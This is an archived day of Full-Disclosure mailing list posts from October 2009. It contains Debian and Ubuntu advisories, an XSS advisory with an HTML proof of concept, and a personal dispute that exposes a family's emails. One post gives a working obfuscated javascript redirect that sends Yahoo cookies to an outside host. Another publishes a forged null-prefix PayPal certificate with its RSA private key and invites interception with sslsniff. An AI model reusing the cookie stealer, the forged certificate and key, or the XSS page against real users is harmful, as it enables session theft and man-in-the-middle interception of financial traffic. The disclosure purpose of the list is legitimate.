date:20091005

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-10-05 Thread laurent gaffie

More explication on cve-2009-3103

http://g-laurent.blogspot.com/2009/10/more-explication-on-cve-2009-3103.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (No subject) legal threat from Alyse Auernheimer

2009-10-05 Thread TheLearner

Sorry about leaving sealpac in there, we're working on correcting 
that. I'll put a notice in the next one.

For the record, the post made in an earlier version of Andrew 
Auernheimer's infodoc states weev has an affiliation with sealpac. 
This is incorrect because weev just took the domain name and failed 
to give it back.

Since you find is necessary to forward this correspondence to the 
FBI, I'll make it public here for you.

It's almost like you're fishing to be a victim or something. It's 
pathetic.

If it means anything: No one has made any threats to you. No one is 
going to harm you. No one has any ill-sentiment towards your family.

You've been done a favor by having your relationship with weev 
clarified on here.

You got your correction, you got your post down, quit being 
melodramatic.

On Mon, 05 Oct 2009 07:50:20 + Alyse Auernheimer 
designadventu...@gmail.com wrote:
Return-Path: designadventu...@gmail.com
Received: from smtp7.hushmail.com (smtp7.hushmail.com 
[65.39.178.136])
 by imap12.hushmail.com (Cyrus v2.3.7-Invoca-RPM-2.3.7-2.el5) with 
LMTPA;
 Mon, 05 Oct 2009 07:50:29 +
X-Sieve: CMU Sieve 2.3
Received: from mail-ew0-f224.google.com (mail-ew0-f224.google.com 
[209.85.219.224])
by smtp7.hushmail.com (Postfix) with ESMTP
for mrxisapl...@hush.com; Mon,  5 Oct 2009 07:50:21 + (UTC)
Received: by ewy24 with SMTP id 24so11122764ewy.22
for mrxisapl...@hush.com; Mon, 05 Oct 2009 00:50:21 -0700 
(PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=gmail.com; s=gamma;
h=domainkey-signature:mime-version:received:date:message-
id:subject
 :from:to:content-type;
bh=O+UD/WD8lCH2KA1S8ZiYbDmjoHo36/uRUHWULElbv7c=;

b=N9iZNiKyHiM6Sso//SeBju/siqip/Kl3QGZ1kBFI6HY0Npx0TU4suw4PixASzY5EdO
 
Mfq8Gc6SEQAaPBmtRv+EPoCENWkaKMg21oRkzgaCwZ90QFnfu7K/H4mfuZHkXehS9irP
 XL273nm8NSog6o7XfyATtsN+2TVdFvwYC6B0w=
DomainKey-Signature: a=rsa-sha1; c=nofws;
d=gmail.com; s=gamma;
h=mime-version:date:message-id:subject:from:to:content-type;

b=HfCFSLplV0dZpvp5Pmk5aqBRGbsW4KwixRJ0KmZHItZhIJkeVGLWeHMPqyBtE3nkg5
 
4XlDiotqE/V0398MMiRyzreqiHrufXjkTdzAYnK1KBHA1pBje2dtlM6l/ICwS+fuLiLt
 9HubIoKXLS126A9FQOYCxML9lQ1qG/DdROv8I=
MIME-Version: 1.0
Received: by 10.216.87.144 with SMTP id 
y16mr622378wee.95.1254729020908; Mon, 
05 Oct 2009 00:50:20 -0700 (PDT)
Date: Mon, 5 Oct 2009 03:50:20 -0400
Message-ID: 
4f8170520910050050v1d44b4d8p6ad4202ac4dc5...@mail.gmail.com
Subject: 
From: Alyse Auernheimer designadventu...@gmail.com
To: TheLearner mrxisapl...@hush.com
Content-Type: multipart/alternative; 
boundary=0016e6d7852e94a5d104752b5dda

Lisa,
Please do not link Andrew Auernheimer with our business, Sealpac 
USA, he has
nothing to do with it except he is holding our domain name hostage. 
We are
planning on pursuing a court order to have it released. All of our 
emails
concerning this subject will now be forwarded to the FBI as it may
potentially impact our business. The individuals who say they are 
trying to
help us are now causing more harm to us than Andrew himself. We are 
advised
to have our home watched by law enforcement and our daughter's 
dorm. This is
just wrong.

Thank You for you consideration.
Alyse

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1901-1] New mediawiki1.7 packages fix several vulnerabilities

2009-10-05 Thread Giuseppe Iuculano

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1901-1  secur...@debian.org
http://www.debian.org/security/  Giuseppe Iuculano
October 05, 2009   http://www.debian.org/security/faq
- 

Package: mediawiki1.7
Vulnerability  : several vulnerabilities
Problem type   : remote
Debian-specific: no
CVE IDs: CVE-2008-5249 CVE-2008-5250 CVE-2008-5252 CVE-2009-0737
Debian Bugs: 508868 508869 508870 514547


Several vulnerabilities have been discovered in mediawiki1.7, a website engine
for collaborative work. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2008-5249

David Remahl discovered that mediawiki1.7 is prone to a cross-site scripting 
attack.

CVE-2008-5250

David Remahl discovered that mediawiki1.7, when Internet Explorer is used and
uploads are enabled, or an SVG scripting browser is used and SVG uploads are
enabled, allows remote authenticated users to inject arbitrary web script or
HTML by editing a wiki page.

CVE-2008-5252

David Remahl discovered that mediawiki1.7 is prone to a cross-site request
forgery vulnerability in the Special:Import feature.

CVE-2009-0737

It was discovered that mediawiki1.7 is prone to a cross-site scripting attack in
the web-based installer.


For the oldstable distribution (etch), these problems have been fixed in version
1.7.1-9etch1 for mediawiki1.7, and mediawiki is not affected (it is a
metapackage for mediawiki1.7).

The stable (lenny) distribution does not include mediawiki1.7, and these
problems have been fixed in version 1:1.12.0-2lenny3 for mediawiki which was
already included in the lenny release.

The unstable (sid) and testing (squeeze) distributions do not
include mediawiki1.7, and these problems have been fixed in version 1:1.14.0-1
for mediawiki.


We recommend that you upgrade your mediawiki1.7 packages.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1-9etch1.dsc
Size/MD5 checksum:  911 7db727bfa3f6139e107af451a90df719
  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1.orig.tar.gz
Size/MD5 checksum:  3256428 50b74e2b5c86fb94c7201b72d2037662
  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1-9etch1.diff.gz
Size/MD5 checksum:46880 f939cc99afd3ff4b330a35ce549fdd7e

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1-9etch1_all.deb
Size/MD5 checksum:  3341486 4d801e5ee141c2affd080437cafa7f0f

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_alpha.deb
Size/MD5 checksum:   180506 526bd0d52438515635abc44afea9e618

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_amd64.deb
Size/MD5 checksum:   137638 b63b1cd4bc45683507e765b5af1aea12

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_arm.deb
Size/MD5 checksum:   140018 a9431b5e427703486a814ed2a7442d62

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_hppa.deb
Size/MD5 checksum:42988 0a7a434f0fcc81b7d8d5e80137ca6569

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_i386.deb
Size/MD5 checksum:   122238 cc04873698abdbf03011336f533c2b06

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_ia64.deb
Size/MD5 checksum:   231730 e3201066e1de24dc9a13d284ea4b685f

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_mips.deb
Size/MD5 checksum:42978 e92b925866416643905a835ab0a5ae2b

mipsel architecture (MIPS (Little Endian))

[Full-disclosure] Yahoo cookie stealer

2009-10-05 Thread Pasca

Found in the wild:
http://funny.byethost16.com

Redirects to:
http://kr.gugi.yahoo.com/myBook/myregion.php?func_mode=loginActiontargetUrl=javascript:document.location=String.fromCharCode(104,116,116,112,58,47,47,102,117,110,110,121,46,98,121,101,116,104,111,115,116,49,54,46,99,111,109,47,105,110,100,101,120,46,112,104,112,63,105,115,114,61).concat(escape(document.cookie));

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1902-1] New elinks packages fix arbitrary code execution

2009-10-05 Thread Moritz Muehlenhoff

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1902-1  secur...@debian.org
http://www.debian.org/security/   Moritz Muehlenhoff
October 05, 2009  http://www.debian.org/security/faq
- 

Package: elinks
Vulnerability  : buffer overflow
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)  : CVE-2008-7224
Debian Bug : 380347

Jakub Wilk discovered an off-by-one buffer overflow in the charset 
handling of elinks, a feature-rich text-mode WWW browser, which might
lead to the execution of arbitrary code if the user is tricked into
opening a malformed HTML page.

For the old stable distribution (etch), this problem has been fixed in
version 0.11.1-1.2etch2.

The stable distribution (lenny) and the unstable distribution (sid)
already contain a patch for this problem.

We recommend that you upgrade your elinks package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2.diff.gz
Size/MD5 checksum:30564 48727476dbfed45200797a0504fa6e4a
  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1.orig.tar.gz
Size/MD5 checksum:  3863617 dce0fa7cb2b6e7194ddd00e34825218b
  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2.dsc
Size/MD5 checksum:  872 870acbbc16c166c0e17669f435cf4478

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_alpha.deb
Size/MD5 checksum:   496748 65a9e90caf0005912d0f307447bb7252
  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_alpha.deb
Size/MD5 checksum:  1264746 750b9c9425d331afdd84ae9e8ec397cc

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_amd64.deb
Size/MD5 checksum:   457658 d35d0729240a9a3e4edf596fab8b5519
  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_amd64.deb
Size/MD5 checksum:  1219062 eeb677af4bd1f969062dcc49a6c5797f

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_arm.deb
Size/MD5 checksum:  1179258 2236eef0018c35106157254f1a9b5371
  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_arm.deb
Size/MD5 checksum:   417026 d6298439e61cfd390dc5f885fa6d3ce9

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_hppa.deb
Size/MD5 checksum:  1249718 200ea460bf1c50c7c77fb818b99d6f93
  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_hppa.deb
Size/MD5 checksum:   481296 4d1ffd49415dc0f727fec71843e0cf1e

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_i386.deb
Size/MD5 checksum:   423782 fd2bdd5f8d85049dd34e9d392cfb0d55
  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_i386.deb
Size/MD5 checksum:  1188386 6b5bd5cc0801cc98c5f89eb755036a58

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_ia64.deb
Size/MD5 checksum:  1432996 3f1c8fd354685e153aa0bf6001811f72
  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_ia64.deb
Size/MD5 checksum:   624264 6ab1d3d6329c2fbbd366c7979846be04

mipsel architecture (MIPS (Little Endian))

  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_mipsel.deb
Size/MD5 checksum:  1223924 88dab6a6625382e7d7531f9f45f2fb6d
  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_mipsel.deb
Size/MD5 checksum:   466916 3f54531dc562935768748e8626c3cd8a

powerpc architecture (PowerPC)

  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_powerpc.deb
Size/MD5 checksum:   450082 4cb3cbeda69cd02ddc99b132d26998c5
  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_powerpc.deb
Size/MD5 checksum:  1216856 ed85e75381a7bfdd094e21e0e16ecbfd

s390 architecture (IBM

[Full-disclosure] null-prefix certificate for paypal

2009-10-05 Thread Tim Jones



If there's really a Moxie Marlinspike fan club [1], I'm definitely a member..  
Attached is one of the null-prefix certificates [2] that he distributed during 
his intercepting secure communication training at Black Hat.  This one's for 
www.paypal.com, and since the Microsoft crypto api appears to remain unpatched, 
it works flawlessly with sslsniff [3] against all clients on Windows (IE, 
Chrome, Safari).  Also, because of Moxie's attacks against OCSP [4], I don't 
think this certificate can be revoked.

Enjoy!

[1]: http://www.linuxtoday.com/security/2009100102035NWNT
[2]: http://www.thughtcrime.org/papers/null-prefix-attacks.pdf
[3]: http://www.thoughtcrime.org/software/sslsniff/
[4]: http://www.thoughtcrime.org/papers/ocsp-attack.pdf

-BEGIN
 CERTIFICATE-
MIIGRDCCBa2gAwIBAgIDAPCbMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC
RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD
VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl
Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3
DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwMjI0MjMwNDE3WhcNMTEwMjI0
MjMwNDE3WjCBlDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU
BgNVBAcTDVNhbiBGcmFuY2lzY28xETAPBgNVBAoTCFNlY3VyaXR5MRQwEgYDVQQL
EwtTZWN1cmUgVW5pdDEvMC0GA1UEAxMmd3d3LnBheXBhbC5jb20Ac3NsLnNlY3Vy
ZWNvbm5lY3Rpb24uY2MwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANJp+m86
ALQhG8ixAtc/GbLEbbRU+IuKzNtywp48YLnGkT2Ct32Z/9EphMFzU5yC3fwkjHfV
QfPoHkKhrS2e/1sQJs6dVxdzFiM4yNbxuqOWWxZnSk9zlzpNFKT04j+LBYNC0dDc
L3rlthCyEcDcISqQ/66XcVpJgaxA8zu4WbJPAgMBAAGjggMhMIIDHTAJBgNVHR
ME
AjAAMBEGCWCGSAGG+EIBAQQEAwIGQDALBgNVHQ8EBAMCA/gwEwYDVR0lBAwwCgYI
KwYBBQUHAwEwHQYDVR0OBBYEFGGPYTRDVRR/JwnOTIvqm3sZJbxuMB8GA1UdIwQY
MBaAFA4HYNQ5yRtbXZB7I8jSNJ1KmkY5MAkGA1UdEQQCMAAwHAYDVR0SBBUwE4ER
Z2VuZXJhbEBpcHNjYS5jb20wcgYJYIZIAYb4QgENBGUWY09yZ2FuaXphdGlvbiBJ
bmZvcm1hdGlvbiBOT1QgVkFMSURBVEVELiBDTEFTRUExIFNlcnZlciBDZXJ0aWZp
Y2F0ZSBpc3N1ZWQgYnkgaHR0cHM6Ly93d3cuaXBzY2EuY29tLzAvBglghkgBhvhC
AQIEIhYgaHR0cHM6Ly93d3cuaXBzY2EuY29tL2lwc2NhMjAwMi8wQwYJYIZIAYb4
QgEEBDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMDAy
Q0xBU0VBMS5jcmwwRgYJYIZIAYb4QgEDBDkWN2h0dHBzOi8vd3d3Lmlwc2NhLmNv
bS9pcHNjYTIwMDIvcmV2b2NhdGlvbkNMQVNFQTEuaHRtbD8wQwYJYIZIAYb4QgEH
BDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvcmVuZXdhbENMQVNF
QTEuaHRtbD8wQQYJYIZIAYb4QgEIBDQWMmh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9p
cHNjYTIwMDIvcG9saWN5Q0xBU0VBMS5odG1sMIGDBgNVHR8EfDB6MDmgN6A1hjNo
dHRwOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMDAyQ0xBU0VBMS5j
cmwwPaA7o
DmGN2h0dHA6Ly93d3diYWNrLmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBz
Y2EyMDAyQ0xBU0VBMS5jcmwwMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzABhhZo
dHRwOi8vb2NzcC5pcHNjYS5jb20vMA0GCSqGSIb3DQEBBQUAA4GBAGjueZeX3Tvv
FmoG8hSabs2eEveqgxC90XyY+seu1A4snjgFnVJgqZkKgbSYkB2uu0rXudyInjd4
QVv3gqXyukElWpAaHkU4oVJYdZQmRPsgB7pEzOVKLXI/mEf2JtwFRgUHYyGrRpuc
eNVUWz0MHshkjLVQI4Jv27giHEOWB6i7
-END CERTIFICATE-

-BEGIN RSA PRIVATE
 KEY-
MIICXQIBAAKBgQDSafpvOgC0IRvIsQLXPxmyxG20VPiLiszbcsKePGC5xpE9grd9
mf/RKYTBc1Ocgt38JIx31UHz6B5Coa0tnv9bECbOnVcXcxYjOMjW8bqjllsWZ0pP
c5c6TRSk9OI/iwWDQtHQ3C965bYQshHA3CEqkP+ul3FaSYGsQPM7uFmyTwIDAQAB
AoGAcqDnnOaVcYxD7Z55NLgckOYv+bj8ulCAb+DiI4AzFaIWh9MJkXRvCAy9VQI1
/6LPukhS+gmE55KBwb0AckUXSRC4DuPXOhgT6ywyEJGQp6IdaQmC4NoyC+G4GPnr
h0YISVKTT1ppRgjF6tpaFvElGTse+yejtKAssduT45MoxGkCQQDx58UFfPCVwAho
J7/4TXpEebYs/BuLKYwQKUuQe1B+dV2WtSaub+jbSSpRVScTpyfKRwN0w4UZzs/6
4Zzs/erbAkEA3qx8uhMy7Dxu8zWx+C1b5LSh4Rf4sCvXug/nx3opvahO89iP5P6L
MVplaVsVPwligUEaMsx9rJEJvt48sMEenQJBAOQlE6MOZ5TETOl2e84BvEuygodA
qfWAlLF1UOgN9SefJ0oIxVeFAhc2lOuqJLWbU6KpgO/xqqlhbLOPbsHw5DsCQDj0
j5acsIrCTnLBCjt7hqSyGzHTCtYs8KnzxYo9Ug3jzgYLH4soHHxMLeJL3NxZzytW
dpgFvCN2mbKLb6SaUPUCQQCKjbXoN7DkBbk8wU0ZY5fGCtLEUHtEmT93nFgmUvQ3
ZSB/EvhtWRPcWGdRC5tj0YxaUFevVhZA/Ng1d1JzbcKB
-END RSA PRIVATE KEY-






  ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-841-1] GLib vulnerability

2009-10-05 Thread Kees Cook

===
Ubuntu Security Notice USN-841-1   October 05, 2009
glib2.0 vulnerability
CVE-2009-3289
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  libglib2.0-02.16.6-0ubuntu1.2

Ubuntu 8.10:
  libglib2.0-02.18.2-0ubuntu2.2

Ubuntu 9.04:
  libglib2.0-02.20.1-0ubuntu2.1

After a standard system upgrade you need to restart your session to effect
the necessary changes.

Details follow:

Arand Nash discovered that applications linked to GLib (e.g. Nautilus)
did not correctly copy symlinks.  If a user copied symlinks with GLib,
the symlink target files would become world-writable, allowing local
attackers to gain access to potentially sensitive information.


Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.16.6-0ubuntu1.2.diff.gz
  Size/MD5:36482 5a747f19839228824de8b801306697b1

http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.16.6-0ubuntu1.2.dsc
  Size/MD5: 1168 b073d48a3ef03f58d58a647ba6bc5152

http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.16.6.orig.tar.gz
  Size/MD5:  6491460 65c594a471406a377bee8171a2ea43d4

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-doc_2.16.6-0ubuntu1.2_all.deb
  Size/MD5:  1131446 3554e3c1d7ff9e967b2a70118ed269d0

http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libglib2.0-data_2.16.6-0ubuntu1.2_all.deb
  Size/MD5:  968 8b2ba86fa2ce1c1ce6f87449a29ba398

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_amd64.deb
  Size/MD5:  1177628 74b9bb38332276d8f27e84a2a989923c

http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_amd64.deb
  Size/MD5:   824766 5d60a5bbee4bb5f5a503cf17b6b968d8

http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_amd64.deb
  Size/MD5:   985446 30a551102c0dc05911b28d18f09094e2

http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libgio-fam_2.16.6-0ubuntu1.2_amd64.deb
  Size/MD5:48396 5fbd8935fc8cdfbc87ddee9dd5ea906e

http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libglib2.0-udeb_2.16.6-0ubuntu1.2_amd64.udeb
  Size/MD5:  1307488 0e797f76924ae31a0a54f596207c1c18

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_i386.deb
  Size/MD5:  1102278 322adce90ad9052eb05e97acb2bb3aed

http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_i386.deb
  Size/MD5:   758442 d60d1a00d850acc2bf29301d2e708c94

http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_i386.deb
  Size/MD5:   872458 21872fd8706eccc3260906e9e18b81f6

http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libgio-fam_2.16.6-0ubuntu1.2_i386.deb
  Size/MD5:46706 5e4456b1527efd940e01c7aca7c65072

http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libglib2.0-udeb_2.16.6-0ubuntu1.2_i386.udeb
  Size/MD5:  1241052 ca6659a5062d06e9f95a794d25aa0bec

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_lpia.deb
  Size/MD5:  1126498 a8cf538453e395b610fd43a0e1d3995c

http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_lpia.deb
  Size/MD5:   749728 b8ab5b52627b33a02dc628518f6e8cc1

http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_lpia.deb
  Size/MD5:   866292 d24055f7c9b3c22743b23b1db647f8c8

http://ports.ubuntu.com/pool/universe/g/glib2.0/libgio-fam_2.16.6-0ubuntu1.2_lpia.deb
  Size/MD5:46612 7b5d6df79a5cc8a2a776b0c67b30a889

http://ports.ubuntu.com/pool/universe/g/glib2.0/libglib2.0-udeb_2.16.6-0ubuntu1.2_lpia.udeb
  Size/MD5:  1232302 fafbeb120762dfb6b82d401106729d21

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_powerpc.deb
  Size/MD5:  1166088 050d4dd8978470c1093993d6c90e596a

http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_powerpc.deb
  Size/MD5:   825162 ecffe44dd39ccfd545503ca4a71fa7e0

http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_powerpc.deb
  Size/MD5:  1033488 700541c029701259dd63002d839e6b58

[Full-disclosure] Advisory: Cross-Site Scripting flaw in AfterLogic WebMail Pro

2009-10-05 Thread Sébastien Duquette

Security Advisory : Cross-Site Scripting flaw in AfterLogic WebMail Pro

Description
-
AfterLogic WebMail Pro is vulnerable to Cross-Site Scripting, allowing injection
of malicious code in the context of the application.

Overview
---
Quote from http://www.afterlogic.com/products/webmail-pro :
Webmail front-end for your existing POP3/IMAP mail server. Offer your users
the fast AJAX webmail and innovative calendar with sharing. Stay in control
with the admin panel and the developer's API.

Details

Vulnerable Product : AfterLogic WebMail Pro = 4.7.10
Vulnerability Type : Cross-Site Scripting (XSS)
Affected page : history-storage.aspx
Vulnerable parameters : HistoryKey, HistoryStorageObjectName
Discovered by :
Sébastien Duquette (http://intheknow-security.blogspot.com)
Gardien Virtuel (www.gardienvirtuel.com)
Original Advisory :
http://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_EN.txt

Timeline
--
Bug Discovered : September 18th, 2009
Vendor Advised : September 23rd, 2009
Fix made available : September 30th, 2009

Proof of concept
---
The targeted user must be logged in the webmail. This proof of concept was
successfully tested in Firefox 3.5 and Internet Explorer 8.

html
head
/head
body onLoad=document.form1.submit()
form name=form1 method=post
action=http://WEBSITE/history-storage.aspx?param=0.21188772204998574;
onSubmit=return false;
input type=hidden name=HistoryKey value=value/
input type=hidden name=HistoryStorageObjectName value=location;
alert('xss'); ///
/form
/body
/html

Solution
-
The vendor has made available a patched version. Update to AfterLogic
Webmail Pro 4.7.11

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

Re: [Full-disclosure] (No subject) legal threat from Alyse Auernheimer

[Full-disclosure] [SECURITY] [DSA 1901-1] New mediawiki1.7 packages fix several vulnerabilities

[Full-disclosure] Yahoo cookie stealer

[Full-disclosure] [SECURITY] [DSA 1902-1] New elinks packages fix arbitrary code execution

[Full-disclosure] null-prefix certificate for paypal

[Full-disclosure] [USN-841-1] GLib vulnerability

[Full-disclosure] Advisory: Cross-Site Scripting flaw in AfterLogic WebMail Pro

8 matches

Site Navigation

Mail list logo

Footer information